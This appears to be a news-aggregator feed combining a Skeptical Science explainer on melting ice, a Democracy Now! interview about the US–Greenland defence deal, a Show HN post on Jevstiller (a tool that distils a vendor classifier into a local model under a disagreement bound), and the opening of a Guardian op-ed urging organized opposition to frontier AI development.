Winter Antarctic sea ice extent is increasing, although it melts completely back to the Antarctic coast each summer, so it is of no consequence in the planetary heat budget. Ozone levels over Antarctica have dropped causing stratospheric cooling and increasing winds, which lead to more areas of open water that can be frozen 24 . In addition, the Southern Ocean is freshening because of increased rain and snowfall as well as an increase in meltwater coming from the edges of Antarctica's land ice 25 . Fresh water freezes more readily than salt water.

Melting Ice: What We Know

  • Arctic sea ice is thinning and losing mass.
  • Summer Arctic sea ice is gradually retreating, and may be completely gone within this century.
  • The Antarctic Ice Sheet is losing mass.
  • The Greenland Ice Sheet is losing mass.
  • The vast majority of the world's glaciers are losing mass.
  • Melted ice will add dramatically to sea level rise.
  • Less ice means less reflected sunlight, which will add significantly to global warming.
  • Melting ice currently accounts for about 2% of the earth's climate system heat uptake.

Melting Ice: How We Know

Scientists employ a variety of instruments and craft to measure ice mass. In the early 20 th century, such measurements were restricted to visiting and directly observing the outer edges of the Arctic ice pack. Scientists still visit the reaches of the earth, using ever more sophisticated instruments, including floating buoys with arrays of sensors and cameras, to catalog the state of the Cryopshere — the world of snow and ice on earth.

Today, changes in the elevation of large ice sheets are measured with extreme accuracy using both laser and radar altimetry. Sensors based on aircraft or satellites measure the distance from the sensor to the ice surface. By repeating the measurements over time, changes are determined. The twin GRACE satellites, launched by NASA in 2002, use lasers to measure minute changes in the distance between the two craft. These variations in distance in turn reflect variations in mass in the earth below, and so act as a measurement (again, over time) of changes in mass loss of the ice sheets. Other satellites use photography, both visible and infra-red, to catalog the ice extents in the Arctic and the size of glaciers.

References

  1. Nuccitelli et al, 2012, Physics Letters A, Volume 376, Issue 45, 1 October 2012, Pages 3466–3468
  2. Levitus, S., et al. (2012), World ocean heat content and thermosteric sea level change (0-2000), 1955-2010, Geophys. Res. Lett. , doi:10.1029/2012GL051106, in press.
  3. Beltrami, H., J. Smerdon, H. Pollack, and S. Huang, Continental heat gain in the global climate system, Geophys. Res. Lett., 29(8), doi:10.1029/2001GL014310, 2002.
  4. Thomas Jacob, John Wahr, W. Tad Pfeffer, and Sean Swenson, Recent contributions of glaciers and ice caps to sea level rise, Nature 482, 514–518 (23 February 2012), doi:10.1038/nature10847
  5. Church, J. A., N. J. White, L. F. Konikow, C. M. Domingues, J. G. Cogley, E. Rignot, J. M. Gregory, M. R. van den Broeke, A. J. Monaghan, and I. Velicogna (2011), Revisiting the Earth's sea-level and energy budgets from 1961 to 2008, Geophys. Res. Lett., 38, L18601, doi:10.1029/2011GL048794.
  6. Grant Foster and Stefan Rahmstorf (2011), Global temperature evolution 1979–2010, Environ. Res. Lett., 6, 044022, doi:10.1088/1748-9326/6/4/044022.
  7. Judith L. Lean and David H. Rind, How natural and anthropogenic influences alter global and regional surface temperatures: 1889 to 2006 (2008), Geophys. Res. Lett., Vol. 35, L18701, doi:10.1029/2008GL034864.
  8. Mike Lockwood, Recent changes in solar outputs and the global mean surface temperature. III. Analysis of contributions to global mean air surface temperature rise, Proc. R. Soc. A 8 June 2008 vol. 464 no. 2094 1387-1404, doi: 10.1098/rspa.2007.0348.
  9. Markus Huber and Reto Knutti, Anthropogenic and natural warming inferred from changes in Earth’s energy balance, Nature Geoscience, 5, 31–36 (2012), doi:10.1038/ngeo1327.
  10. Gregory A Zielinski, Use of paleo-records in determining variability within the volcanism–climate system, Quaternary Science Reviews 01/2000; DOI:10.1016/S0277-3791(99)00073-6
  11. Hegerl, G. C., T. J. Crowley, S. K. Baum, K.-Y. Kim, and W. T. Hyde (2003), Detection of volcanic, solar and greenhouse gas signals in paleo-reconstructions of Northern Hemispheric temperature, Geophys. Res. Lett., 30, 1242, doi:10.1029/2002GL016635, 5.
  12. Robert K. Kaufmanna, Heikki Kauppib, Michael L. Manna, and James H. Stockc, Reconciling anthropogenic climate change with observed temperature 1998–2008, PNAS July 19, 2011 vol. 108 no. 29 11790-11793, doi: 10.1073/pnas.1102467108.
  13. Alex S. Gardner, Geir Moholdt, Bert Wouters, Gabriel J. Wolken, David O. Burgess, Martin J. Sharp, J. Graham Cogley, Carsten Braun, and Claude Labine, Sharply increased mass loss from glaciers and ice caps in the Canadian Arctic Archipelago, Nature 473, 357–360 (19 May 2011) doi:10.1038/nature10089.
  14. Hock, R., M. de Woul, V. Radić, and M. Dyurgerov (2009), Mountain glaciers and ice caps around Antarctica make a large sea-level rise contribution, Geophys. Res. Lett., 36, L07501, doi:10.1029/2008GL037020.
  15. Church, J. A., N. J. White, L. F. Konikow, C. M. Domingues, J. G. Cogley, E. Rignot, J. M. Gregory, M. R. van den Broeke, A. J. Monaghan, and I. Velicogna (2011), Revisiting the Earth's sea-level and energy budgets from 1961 to 2008, Geophys. Res. Lett., 38, L18601, doi:10.1029/2011GL048794.
  16. Wouters, B., D. Chambers, and E. J. O. Schrama (2008), GRACE observes small-scale mass loss in Greenland, Geophys. Res. Lett., 35, L20501, doi:10.1029/2008GL034816.
  17. Velicogna, I. (2009), Increasing rates of ice mass loss from the Greenland and Antarctic ice sheets revealed by GRACE, Geophys. Res. Lett., 36, L19503, doi:10.1029/2009GL040222.
  18. Khan, S. A., J. Wahr, M. Bevis, I. Velicogna, and E. Kendrick (2010), Spread of ice mass loss into northwest Greenland observed by GRACE and GPS, Geophys. Res. Lett., 37, L06501, doi:10.1029/2010GL042460.
  19. Giles, K. A., S. W. Laxon, and A. L. Ridout (2008), Circumpolar thinning of Arctic sea ice following the 2007 record ice extent minimum, Geophys. Res. Lett., 35, L22502, doi:10.1029/2008GL035710.
  20. Kwok, R., G. F. Cunningham, M. Wensnahan, I. Rigor, H. J. Zwally, and D. Yi (2009), Thinning and volume loss of the Arctic Ocean sea ice cover: 2003–2008, J. Geophys. Res., 114, C07005, doi:10.1029/2009JC005312.
  21. Zhang, J., M. Steele, and A. Schweiger (2010), Arctic sea ice response to atmospheric forcings with varying levels of anthropogenic warming and climate variability, Geophys. Res. Lett., 37, L20505, doi:10.1029/2010GL044988.
  22. C. P. Cook, T. Flierdt, T. Williams, S. R. Hemming, M. Iwai, M. Kobayashi, F. J. Jimenez-Espejo, C. Escutia, J. J. González, Boo-Keun Khim, R. M. McKay, S. Passchier, S. M. Bohaty, C. R. Riesselman, L. Tauxe, S. Sugisaki, A. L. Galindo, M. O. Patterson, F. Sangiorgi, E. L. Pierce, H. Brinkhuis, A. Klaus, A. Fehr, J. A. P. Bendle, P. K. Bijl, Dynamic behaviour of the East Antarctic ice sheet during Pliocene warmth, Nature Geoscience 6, 765–769 (2013), doi:10.1038/ngeo1889
  23. M.A. King, R.J. Bingham, P. Moore, P.L. Whitehouse, M.J. Bentley, and G.A. Milne, Lower satellite-gravimetry estimates of Antarctic sea-level contribution, Nature, 2012. doi: 10.1038/nature11621
  24. Turner, J., J. C. Comiso, G. J. Marshall, T. A. Lachlan-Cope, T. Bracegirdle, T. Maksym, M. P. Meredith, Z. Wang, and A. Orr (2009), Non-annular atmospheric circulation change induced by stratospheric ozone depletion and its role in the recent increase of Antarctic sea ice extent, Geophys. Res. Lett., 36, L08502, doi:10.1029/2009GL037524.
  25. R. Bintanja, G. J. van Oldenborgh, S. S. Drijfhout, B. Wouters, and C. A. Katsman, Important role for ocean warming and increased ice-shelf melt in Antarctic sea-ice expansion, Nature Geoscience 6, 376–379 (2013), doi:10.1038/ngeo1767
  26. A. Shepherd, E. R. Ivins, G. A, V. R. Barletta, M. J. Bentley, S. Bettadpur, K. H. Briggs, D. H. Bromwich, R. Forsberg, N. Galin, M. Horwath, S. Jacobs, I. Joughin, M. A. King, J. T. M. Lenaerts, J. Li, S. R. M. Ligtenberg, A. Luckman, S. B. Luthcke, M. McMillan, R. Meister, G. Milne, J. Mouginot, A. Muir, J. P. Nicolas, J. Paden, A. J. Payne, H. Pritchard, E. Rignot, H. Rott, L. Sandberg Sørensen, T. A. Scambos, B. Scheuchl, E. J. O. Schrama, B. Smith, A. V. Sundal, J. H. van Angelen, W. J. van de Berg, M. R. van den Broeke, D. G. Vaughan, I. Velicogna, J. Wahr, P. L. Whitehouse, D. J. Wingham, D. Yi, D. Young, H. Jay Zwally, A Reconciled Estimate of Ice-Sheet Mass Balance, Science 30 November 2012:Vol. 338 no. 6111 pp. 1183-1189, doi:10.1126/science.1228102
  27. R. Bintanja, G. J. van Oldenborgh, S. S. Drijfhout, B. Wouters, and C. A. Katsman, Important role for ocean warming and increased ice-shelf melt in Antarctic sea-ice expansion, Nature Geoscience 6, 376–379 (2013), doi:10.1038/ngeo1767
  28. Skeptical Science, “Positives and Negatives of Global Warming”

Skeptical Science

Skeptical Science was founded in 2007 by John Cook as a combination database and website intended to help people to see through the myths, fabrications, and confusion behind the misrepresentation of climate science. It delves into what the actual scientists really say, supported by references to the peer-reviewed scientific literature.

Today, Skeptical Science has grown into a reference source for the layman, a living rebuttal to the multitude of myths about climate change, and a topical blog that keeps people up to date on current state of the quickly evolving field of climate science. Rebuttals to myths are written at basic, intermediate and advanced levels. Blog posts cover scientific papers, current events, and the ongoing state of the climate.

Have a question? Want to learn more? Confused by a fake skeptic's myth?

Visit Skeptical Science and get the facts.

Contact Us

Have questions about the widget? E-mail:

widgets@skepticalscience.com

Created By Skeptical Science

This site and the widget have been created by the Skeptical Science team, as a way to help people to understand the gravity of climate change as well as a way to help promote awareness in others.

Skeptical Science is an entirely non-profit, volunteer organization, built by the efforts of a multitude of intelligent, educated people who understand, appreciate and are seriously worried about the impacts of climate change on the future of our society, lives and happiness.

Credits

  1. Concept:

    John Cook & Dana Nuccitelli
  2. Design and Development:

    Robert N. Lacatena
  3. Graphics:

    John Garret
  4. Testing Lead:

    Bärbel Winkler
  5. Content:

    The Skeptical Science Team

The Conversation

Get the iPhone Heat Widget App

Want to put the Heat Widget on your iPhone, to show your friends, family and co-workers? Just follow these simple steps.

1. At the end of these instructions, you'll click the link below to open the iPhone version of the widget.

2. After the app opens in your browser, click the “Share” icon at the bottom.

3. On the subsequent screen, click the “Add to Home Screen” to add this app to your iPhone.

4. You'll see the app placed on your Home Screen. When you go back into Safari, just close the app page.

Note: The iPhone App is not available through the App Store (it's what's know as a “Web App”). You can only get it by visiting the link and adding it using the steps above.

Get the iPad Heat Widget App

Want to put the Heat Widget on your iPad, to show your friends, family and co-workers? Just follow these simple steps.

1. At the end of these instructions, you'll click the link below to open the iPad version of the widget.

2. After the app opens in your browser, click the “Share” icon at the bottom.

3. On the subsequent screen, click the “Add to Home Screen” to add this app to your iPad.

4. You'll see the app placed on your Home Screen. When you go back into Safari, just close the app page.

Note: The iPad App is not available through the App Store (it's what's know as a “Web App”). You can only get it by visiting the link and adding it using the steps above.

Greenland Deal: Trump Drops Threat to Annex Denmark Territory in Favor of Greater U.S. Military Role

Democracy Now!
www.democracynow.org
2026-09-29 08:14:09
After months of threatening to take over Greenland by force, President Trump last week signed a 10-page agreement with Greenland and Denmark that bolsters the U.S. military presence on the mineral-rich and strategically located island but falls short of his earlier demands to make it American territ...
Original Article

This is a rush transcript. Copy may not be in its final form.

AMY GOODMAN : Remember when President Trump said this shortly after he returned to the White House?

PRESIDENT DONALD TRUMP : We need Greenland for national security and even international security, and we’re working with everybody involved to try and get it. But we need it, really, for international world security. And I think we’re going to get it. One way or the other, we’re going to get it.

AMY GOODMAN : Well, after more than a year and a half of threatening to take over Greenland by force, President Trump last week signed a 10-page agreement with Greenland and Denmark that fell short of his earlier demands to turn Greenland into U.S. territory. The deal, that Trump described as “tremendous,” allows the United States to open new bases in Greenland, bolstering its military presence on the vast, mineral-rich and strategically located island.

Under the 1951 Defense of Greenland Treaty, the United States already has wide latitude to station forces and build military bases in Greenland. The U.S. currently has one active military base on Greenland, about 160 troops on the ground. During the height of the Cold War, the U.S. maintained 17 military installations in Greenland with over 10,000 troops. Under the new deal, the U.S. would be allowed to build two new bases.

The new agreement, signed shortly after President Trump’s speech to the U.N. General Assembly last week, recognizes Greenland as part of Denmark but would still apply if Greenland eventually chooses independence. Describing as, quote, “a deal that could last forever,” the Danish Prime Minister Mette Frederiksen praised the deal as strengthening NATO and staving off the growing presence of Russia and China in the Arctic.

PRIME MINISTER METTE FREDERIKSEN : This deal is good for the United States. It’s good for Greenland, for Denmark, for the NATO alliance, and therefore, also good for Europe. … Mr. President, you have been very clear. You don’t want adversaries to come too close. I fully agree. And with this deal, they are not. We are making sure that they will not be allowed to get any control or significant influence in Greenland,

AMY GOODMAN : Greenland’s Prime Minister Jens-Frederik Nielsen reiterated his support for the United States and the NATO alliance.

PRIME MINISTER JENS - FREDERIK NIELSEN : This agreement should put to rest any doubt today and in the future about where Greenland’s loyalty lies. Our commitment to this alliance and to the security we build together is not in question. We are, have been and will remain a steadfast friend of the United States and a part of the Western alliance. Your security is our security, and our security is your security.

AMY GOODMAN : To understand more about this deal and what it really means, we’re joined now by Julie Rademacher, chair of Uagut, which means Us, an organization for Greenlanders in Denmark. Julia is a former member of the parliament here in Denmark.

Welcome to Democracy Now! It’s great to have you, well, in your in your country here. Talk about the significance of this. You had President Trump saying he’s taking over Greenland, he’s annexing Greenland, he’s occupying Greenland, and now there’s this deal made between your country, Greenland, and Denmark and the United States, but involves expansion of the U.S. military presence.

JULIE RADEMACHER : Well, we already have military presence by the U.S. in Greenland, and we have had that for several decades. Actually, it’s been even more in the past. So two more military bases will not be new in Greenland. But it’s very important for the Greenlandic people that they are listened to, because the last time the Americans left the bases, they didn’t clean up. So, this is one of the very important questions asked by the public in Greenland.

But the deal has been absolutely amazing in so many years in Greenland, because we have felt listened to the last week. For the first time in world history, an American president has said out loud, “Yes, it’s the Greenlanders’ right for self-determination.” And we’ve been not only fighting for Greenland the past one-and-a-half year, but also been the front of the fight for democracy in the world, because we’ve been fighting for our own right to decide whether or not Greenland should be part of Denmark, U.S. or become independent. And with this deal, Greenland can do what Greenlanders in Greenland want it to do. So, I think, in many ways, it’s definitely a good deal for Greenland and for Greenlanders. So it’s been great news, especially concerning the last one-and-a-half year, where we have felt threatened by the American president.

AMY GOODMAN : So, what would you like to see happen with Greenland? I mean, you are a member of the Danish parliament here. You are a Greenlander. What does Uagut, your organization, the organization of Greenlanders in Denmark, want?

JULIE RADEMACHER : Yeah, as a former member of the Danish parliament and also as a Greenlander, I’ve been living for so many years in Greenland. I’m a mother also, so, for me, it’s very important that the future of Greenland will be decided by Greenlanders also in Greenland. I think, in so many ways, we have been threatened by military with force, to be taken over by annexation of — the U.S. Congress still have the proposal that they want to annex Greenland. So, I would like to see that happen in reality, not only on a paper, now signed by the American president, but also in reality, definitely.

But I also kind of have and worry that the trust between Americans, Greenlanders and Danes is not the same anymore, because we’ve always relied on the Americans, we’ve always trusted the Americans and the American president to be our protector, but now after threats in one-and-a-half year to annex Greenland, we don’t have the same faith or the same trust in Americans and the U.S. president. So, we definitely have some work, something to work on in the future.

AMY GOODMAN : Julie Rademacher, so far Trump has vowed to build two, as he says, “very major bases” in Greenland. There’s also interest in Greenland’s resources. If you can talk about this? Last month, it was reported that a U.S. oil company linked to President Trump, called Greenland Energy, was preparing to drill in Greenland without local approval. The firm recently landed drilling equipment on Greenland’s eastern coast. Greenland’s government issued a strong warning that no permission was granted. The island’s Mineral Resources Authority must provide all future logistical operations before they proceed, officials said. What are Trump’s personal interests here?

JULIE RADEMACHER : Well, that question, you have to ask the American president. But I can say that, as Greenlanders, our interest is to be listened to. We have our own democracy in Greenland. We have a self-rule government. We’re also part of the Kingdom of Denmark. So, when we make deals, we do it together with Greenland and Denmark, and then, of course, also negotiate with other countries, like the U.S. If Americans want to drill for oil in Greenland, it has to be approved by the population in Greenland. You know, Greenlanders don’t go to the U.S. and drill for oil. So, of course, Americans also have to ask Greenlanders if they want to, yeah, drill for oil, and the government and municipalities have to approve it. And this hasn’t been the case.

So, in so many ways, we still fight for the platform and also to be listened to as Greenlanders. Because of the MAGA movement and because of all these investments going on, we are still quite worried that money men from MAGA movement will try and buy Greenland in other hands, also despite the fact of this new deal on security. So, I think we are very much aware of that.

AMY GOODMAN : Trump said in a social media post announcing this agreement that it “gives the United States permanent control over security, and all other needs, in Greenland, completely addressing ALL of our many U.S. concerns,” he said. What does he mean, “permanent control” of “all other needs”?

JULIE RADEMACHER : Well, again, you have to ask that question to the American president. But I think, in many ways, the deal is good, because the right for self-determination is approved in the deal, and also the fact that if Greenlanders want to become independent within the NATO alliance, it can happen. So, for the first time in history, Greenlanders are actually acknowledged and also approved as a people for the right to Greenland.

But at the same time, we can see that if you want to build U.S. military bases in Greenland, it also has a chapter in the deal where it says it has to be with respect of the culture, of the fishery, of the hunting. Right now it’s hunting season in Greenland, so everyone is talking about reindeers and caribou hunting. And at the same time, we sit here in Copenhagen discussing this in a room. And many people ask me here in Denmark, “So, how — what do the Greenlanders talk about?” And I tell them, “Well, they talk about reindeers and caribous, because it’s that time of the year.” But at the same time, yes, definitely, we sleep better now at night with this deal, but we still have uncertainty and worries, and we don’t feel completely that we can completely rely on the Americans.

AMY GOODMAN : And who are the adversaries that the Danish prime minister referred to?

JULIE RADEMACHER : Adversaries?

AMY GOODMAN : He talks about the adversaries, the interest of different powers in the Arctic.

JULIE RADEMACHER : Yes, I think, in so many ways, it’s the Arctic is opening up. We already saw that in the American U.S. Navy strategies from 2018. I believe it’s very important that now Greenland, Denmark and the European Union works on new Arctic strategies, and also they work on working to — they work very close together with the Americans about security in the Arctic. Because who’s the real enemy here? You know, maybe it’s Russia and China, and not Denmark and the U.S. So, I think it’s very important that we can make deals on security and that we now have leaders in the same room signing deals, but also diplomats that can negotiate, because we haven’t seen that for one-and-a-half year. We have just felt terrified and being threatened. So, this is definitely a new situation, but we are still worried as Greenlanders, in both Denmark and also in Greenland.

AMY GOODMAN : And who is paying for this deal? Trump said there will be no cost to the United States.

JULIE RADEMACHER : Yeah, that’s kind of interesting, because at the same time Trump wants more military in Greenland. So, I don’t know who’s paying for the new military in Greenland. But we can hear on the Danish and Greenlandic leaders that it will not be the Danes and the Greenlanders that will pay. So, it’s going to be interesting to follow. And I can see in financial acts and suggestions and proposals for next year again that it isn’t in the budget. So, that’s a good question to ask back home in the U.S., too.

AMY GOODMAN : Also, aren’t there four unexploded nuclear bombs dropped by a U.S. B-52 bomber there from 1968 still under the ice?

JULIE RADEMACHER : Yes, and there was also this very crazy project where the Americans drilled, like, a tunnel inside of the ice cap. So, we have several military bases where the Americans haven’t cleaned up in Greenland, and that’s also why many people in Greenland are worried that these military bases will be built, but with no respect of the culture of the local people, of the hunters, but also of the environment and nature, because for Greenlanders, it’s — for us, the nature is like a holy place. It’s what we come from. It’s what we live by. So, for us, it’s very important that it’s respected.

AMY GOODMAN : Julie Rademacher, we want to thank you so much for being with you. It’s nice to be in the same studio with you here in Copenhagen. She is chair of Uagut. It means Us, the national organization for Greenlanders in Denmark. She is a former member of the Danish parliament.

Coming up, as the death toll in Gaza tops 74,000 over these past three years, we’ll speak to the Palestinian analyst Muhammad Shehada. He’s from Gaza but lives here in Denmark. Stay with us.

[break]

AMY GOODMAN : Song by Aaju Peter, a Greenlandic Inuit activist and attorney.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Show HN: Jevstiller – Distill Jev into a local model, with a disagreement bound

Hacker News
jevstiller.pages.dev
2026-09-29 08:05:07
Comments...
Original Article

September 2026. Every number here is from the benchmarks , and bash experiments/bench.sh --no-record reruns them without an API key.

If you classify text with Jev , every answer is a network call to one vendor and comes back in about 300 ms, at any load. For a batch job that is fine. For an agent loop that decides, acts, and decides again, or a game tick, or anything that classifies then acts, 300 ms per step is the whole budget.

Jevstiller sits in front of that call, learns a small local model from Jev’s own answers, and lets it answer what it is sure about in about 15 ms on a CPU. The interesting part is not the small model. It is the contract:

Set one number, say 98%. Jevstiller returns the label Jev would have returned on at least that share of requests.

This post is about what it takes to make that sentence true, why the obvious way of picking a confidence threshold does not make it true, and what it costs.

A frozen sentence encoder (bge-small, 384 dimensions, ONNX Runtime on CPU) embeds each request. On top of it Jevstiller trains a multinomial logistic regression head, one linear layer and a softmax, by cross-entropy against Jev’s full probability distribution over the task’s labels rather than its top label alone, with full-batch Adam and early stopping on a validation slice. That is the whole model: a few hundred kilobytes, trained in seconds on a few thousand rows, retrained every 2,000 new Jev answers, versioned, and shadow-tested on live traffic before it is promoted.

Next to it sit two small things that decide when the head is allowed to answer: a k-nearest-neighbour out-of-distribution scorer over the training embeddings, and a routing policy, a confidence threshold plus an OOD cutoff, calibrated on a held-out IID split with the bound described below. A request above the threshold and inside the training distribution gets the head’s answer in about 15 ms; everything else goes to Jev. The code paths are in DESIGN.md §7.3 to §7.6.

Per task, over a window of traffic, call c the share of requests the local model answers (coverage), and e the share of those where its label differs from Jev’s. Requests it does not answer go to Jev and agree with Jev by definition. So the system’s agreement with Jev is

Your target A* gives a budget β = 1 − A* : the share of all requests that may end up with an answer Jev would not have given. At 98%, that is 2 in 100. The router’s job is to answer as much as it can while keeping c · e under β .

Two things are deliberately absent from that sentence. It says nothing about the model’s accuracy against the truth: if Jev is wrong, the local model is wrong the same way, and the status report says so next to every number. And it is a statement about agreement over all requests, not about the local model’s accuracy on the requests it chose to answer. The first framing is what you can verify; the second is what most tools report.

The usual recipe for a cascade like this: hold out some data, sweep a confidence threshold, keep the loosest one whose measured disagreement is within budget, ship it. It is what you would write in an afternoon, and it is what the point-estimate rule in our benchmark does.

Then it breaks the budget about half the time. On five public tasks, twenty random train/calibration/test splits each, the point-estimate rule exceeded the 2% budget on 6 to 12 of 20 splits per task, by up to a full percentage point:

Task Rule Coverage Disagreement, mean worst Budget broken
Banking77 (77 intents) point estimate 79.8% 1.90% 2.70% 9 / 20
Banking77 bound 74.9% 1.15% 1.55% 0 / 20
CLINC150 (151 intents) point estimate 84.3% 2.09% 2.85% 12 / 20
CLINC150 bound 78.9% 1.25% 1.80% 0 / 20
AG News (4 classes) point estimate 90.3% 2.06% 2.65% 11 / 20
AG News bound 86.5% 1.34% 1.75% 0 / 20
TweetEval sentiment point estimate 28.2% 1.99% 2.60% 8 / 20
TweetEval sentiment bound 24.0% 1.46% 2.10% 1 / 20
TweetEval offensive point estimate 36.8% 1.81% 2.70% 6 / 20
TweetEval offensive bound 28.7% 1.10% 1.40% 0 / 20

This is not a bug in the recipe. It is what selecting the loosest passing threshold on finite data does. The measured disagreement at any threshold is a noisy estimate of the true one. Picking the loosest threshold that looks under budget picks, preferentially, a threshold whose noise happened to point downward. On the next sample of traffic the noise points elsewhere, and the threshold that measured 1.9% delivers 2.7%.

Across 100 splits the bound broke the budget once, at 2.10%. That once is expected: the bound is a 95% statement, so about 5 in 100 may miss. The point estimate is not a statement at all.

Four decisions, each small, together make the contract hold with probability at least 95% for every version of the local model that goes into production.

1. The loss is the contract itself. For each row of an IID calibration set, labelled by Jev and never used for training, score 1 if the local model would answer it and would disagree with Jev , else 0. The average of that indicator over all rows is exactly “disagreement over all requests”, the quantity the budget limits. It is a binomial, so it has an exact confidence bound, Clopper–Pearson, with no approximation and no appeal to large samples.

2. Test the thresholds strictest first, on a fixed grid, and stop at the first failure. The rate can only grow as the threshold loosens, so walking from the strictest candidate to the loosest, checking each one’s upper bound against the budget, and stopping at the first that fails, controls the chance of a wrong choice at the same 5% with no correction for having tested many candidates. This is fixed-sequence testing, as in Learn Then Test . The grid is fixed before any calibration row is seen; the calibration rows only test.

3. Nothing else touches the calibration rows. The out-of-distribution gate, which sends unfamiliar inputs to Jev regardless of confidence, gets its cutoff from the training data. The candidate thresholds are a fixed grid. If either were tuned on the calibration rows, the bound would be computed on data that had already been used to choose what it bounds, which is the point-estimate mistake in a different coat.

4. Leave headroom. The threshold is fitted at 85% of the budget. A candidate then has to pass a second check at the full budget on the calibration rows pooled with fresh traffic it shadowed. That check is not an independent guarantee, since the calibration rows helped choose the threshold, but it catches a threshold that would sit exactly on the line.

The first version of this got two of the four wrong: it bounded the selective rate and multiplied by an estimated coverage as if it were exact, and it kept the loosest of 200 thresholds that each passed on their own, which selects on noise just like the point estimate. A prior-art review caught both. The corrected rule cost nothing on the Banking77 replay: coverage moved from 70.6% to 70.7%.

Jev returns a confidence with every answer, and its docs suggest treating a low one as “unsure”: send it to a human, ask again, take the safe branch. A local model that answers only when it is confident silently breaks that pattern, because a local answer never comes back unsure. On the benchmark tasks, a check at 0.6 lost 8 to 37% of the flags Jev would have raised.

Since 0.4.0 a task can carry a confidence_floor : the Jev confidence below which your code treats an answer as unsure. The calibration, the shadow test and the audit then count a local answer as a disagreement not only when its label differs from Jev’s but also when Jev would have answered below the floor. The same 2% budget covers both. Requests Jev would be unsure about go to Jev, and its own confidence comes back. It costs coverage, 4 to 12 points at a floor of 0.6 on the five tasks, and it is off unless you set it.

A bound at promotion time is not enough, for two reasons. The local model retrains as traffic accumulates, and every retrain spends the 5% again, so over many versions some will miss. And traffic changes, or Jev’s answers do.

So a fixed 2% of all requests goes to Jev regardless of what the local model thinks, with the local model’s answer recorded alongside. That audit slice is the only unbiased view of production once routing begins: the requests the local model declines are the hard ones by construction, and measuring agreement on them would measure the router, not the world. The audit gives a confidence interval on live agreement, per version, scored with the answer each request was actually served. When it drops below target the audit rate goes up; when its own bound confirms a breach, every request goes back to Jev and training restarts from that point.

In the 24-hour soak, a stand-in Jev silently changed every answer at hour twelve. The local share fell from 90% to 9% within four minutes as the audits caught it, and was back at 90% within 49 minutes, trained on post-change answers only, with nobody touching anything.

Coverage. The bound is conservative on finite data, and that is the point: it gave up four to eight points of coverage against the point-estimate rule on every task above. Training on Jev’s full probability distributions rather than its top label buys two to three points back on the many-class tasks.

The target is a dial. On the same five tasks, moving it from 98% to 95% roughly doubles what the tweet tasks answer locally and lifts the intent tasks from about 70% to the low 80s. Across the whole range, from 99% down to 90%, the system’s accuracy against the datasets’ own labels stayed within a point of Jev’s, because where the local model differs from Jev it is about as often right as Jev was. That held on these five tasks; it is not a law.

Coverage also tracks Jev’s consistency, not the task’s difficulty. On the two tweet tasks Jev agrees with the human labels only 64% and 74% of the time, so its answers near the class boundaries are noisy, and a local model cannot reproduce noise within a 2% budget. It answers the confident quarter and forwards the rest.

The bound assumes the calibration rows are a random sample of the traffic the threshold will be used on. If the traffic mix shifts, the bound on the old mix says nothing about the new one, which is what the audit is for. Agreement is not accuracy. And the contract is per request, not per class: a rare class can carry most of the disagreements. Per-class budgets are on the roadmap.

Selective classification with a risk guarantee is Geifman and El-Yaniv, 2017 ; the fixed-sequence testing is from Learn Then Test . Cascades that learn from a large model’s answers appear in OCaTS (EMNLP Findings 2023) and Cache & Distil (ACL Findings 2024), without a bound; BARGAIN makes the same agreement contract with finite-sample guarantees, for batch processing; vCache (ICLR 2026) gives a similar guarantee for a semantic cache. Jevstiller’s contribution is the combination in a running system: the guarantee kept under continual retraining, a permanent audit, drift detection, and a lineage that restarts training when the teacher changes.

git clone https://github.com/tomerglick57/Jevstiller && cd Jevstiller && pip install jevstiller

bash experiments/reproduce.sh # the Banking77 result, from Jev's recorded answers, no key, ~10 min

bash experiments/bench.sh --no-record # all five tasks and the threshold-rule comparison, an hour or two

Apache 2.0. Or put it in front of your own Jev calls: docker run -d -p 8080:8080 -v jevstiller-data:/data ghcr.io/tomerglick57/jevstiller , point TYPESAFE_BASE_URL at it, and read the status report after a few thousand requests. It prints the bound it achieved, and the interval the audit has measured since.

Stop shaming people for using AI. Start organizing to prevent our obsolescence | Garrison Lovely

Guardian
www.theguardian.com
2026-09-29 08:00:50
The industry is engaged in a perverse quest to replace humans. We cannot cede the best tools available to the other side I don’t need to tell you that people hate AI. The list of grievances is long: slop, cheating, bias, enfeeblement, electricity bills, environmental destruction, exploitation, theft...
Original Article

I don’t need to tell you that people hate AI. The list of grievances is long: slop, cheating, bias, enfeeblement, electricity bills, environmental destruction, exploitation, theft, cybercrime, doom. But resistance to the technology has often taken the form of shaming people for personally using it, with precious little organizing against the companies building the machines. This is perplexing, given that those companies are attempting to render us obsolete.

The executives may contest this framing, offering some bromides about how AI will augment human work or how we’ll simply find new jobs to do. But their clear goals are to create systems that so clearly surpass our abilities that we will have little hope of competing.

OpenAI defines its north star of artificial general intelligence (AGI) as “a highly autonomous system that outperforms humans at most economically valuable work”. And the Anthropic CEO, Dario Amodei, writes : “AI isn’t a substitute for specific human jobs but rather a general labor substitute for humans.”

The industry’s ultimate ambition, what it calls AGI, is better understood as a universal labor-replacing machine. These systems would be able to do any work a human could do from a remote desk – leaving livelihoods safe to the extent a human touch is preferred, a physical presence is required, or the jobs themselves are legally protected.

You may doubt that the industry will ever succeed in its perverse quest, but we should agree that it shouldn’t even be allowed to try.

We should freeze frontier AI development – that is, the effort to build AGI, and only resume the work when there is strong public buy-in and broad scientific consensus that it will be done safely and controllably.

But realizing this commonsense ideal will require us to get organized enough to overcome the richest industry in history. And that means changing the way we think about AI.

In many corners of the internet, especially on the left, people pride themselves on never touching the stuff – while simultaneously making bold, deeply mistaken claims about its nature and capabilities.

I understand the reluctance to give these companies your money, your data, your attention. But using what is increasingly an indispensable technology is not an endorsement of the industry building it, any more so than using Instagram to advocate for aggressive regulations on social media would be an endorsement of Mark Zuckerberg’s toxic empire.

Moreover, the people using AI are going to outcompete the ones who don’t, bending the world in their preferred direction, while forming a deeper understanding of the technology itself. Bosses will use Claude Code to replace workers, while the leftist policy analyst Matt Bruenig is having it build a publicly accessible, automatically updating database of National Labor Relations Board decisions. If you’re serious about your mission, you should use whichever tools work best.

Most importantly, anyone not seriously engaging with what the technology can already do – and might soon do – is ceding their seat at the table. Sixty-nine active members of Congress have publicly used terms like artificial superintelligence, the Singularity and AI existential risk. If certain techies are the only people willing to acknowledge that the technology’s capabilities have dramatically improved and could pose a species-level threat in the future, that’s who concerned policymakers will disproportionately listen to.

